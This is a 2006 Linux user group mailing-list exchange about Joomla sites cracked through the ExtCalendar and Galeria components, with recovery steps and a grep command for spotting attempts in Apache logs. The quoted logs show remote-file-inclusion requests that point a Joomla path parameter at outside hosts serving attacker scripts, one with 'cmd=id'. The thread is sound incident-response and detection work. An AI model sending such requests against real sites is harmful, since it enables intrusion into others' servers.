-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 JD Austin wrote: > If you're not on version 1.0.10 upgrade now: > http://www.joomla.org/content/view/1510/74/ > I wouldn't be surprised if they make major changes in Joomla to stomp > out this type of thing. > > In all cases I've had an issue the database was unaffected, only the files. > After the initial panic that I might have been rooted I was relieved > when I found out how they whacked the index.php and configuration.php > files on a few of my inactive sites. > > After you restore the site, remove com_extcalendar and com_galeria if > they're still installed. > Check the directory structure to make sure they're gone. > Also check your temp directory for strangeness.. like a '.a' directory. > > If you check your logs you'll find stuff like this: > > XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0" > XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" > XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" > > > I regularly check to see what they're trying to circumvent now by > grepping for this type of vulnerability in the apache access logs: > /bin/grep mosConfig_absolute_path=http > /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack > attempts' jd@twingeckos.com > The location of your apache logs may be different. If you don't have > root you can download the logs for your domain and grep them locally. > > JD Thanks, JD. Good advice. I am in contact with Integrum. The site was, in fact, cracked via the ext_calendar component that I thought I had patched. Integrum caught it early this morning and took the site off line to thwart the attack. We are now discussing the means of getting back online without re-instating the vulnerability. It will probably be tomorrow before the site is back online simply because Integrum has been handling issues with it since very early this morning. They need to leave it for a while. I thank them for their efforts and support! I'll be on the phone with them tomorrow morning. I'll keep updating status here in the list. Alan -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org iD8DBQFEvYi9DQw/VSQuFZYRAqpxAJ9vR3s9GGc+yvKCQ6ciMNCUNe1wPACfSHS1 WcdlshZzjYH2ryyDdlyP6A8= =Np1E -----END PGP SIGNATURE----- --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change you mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss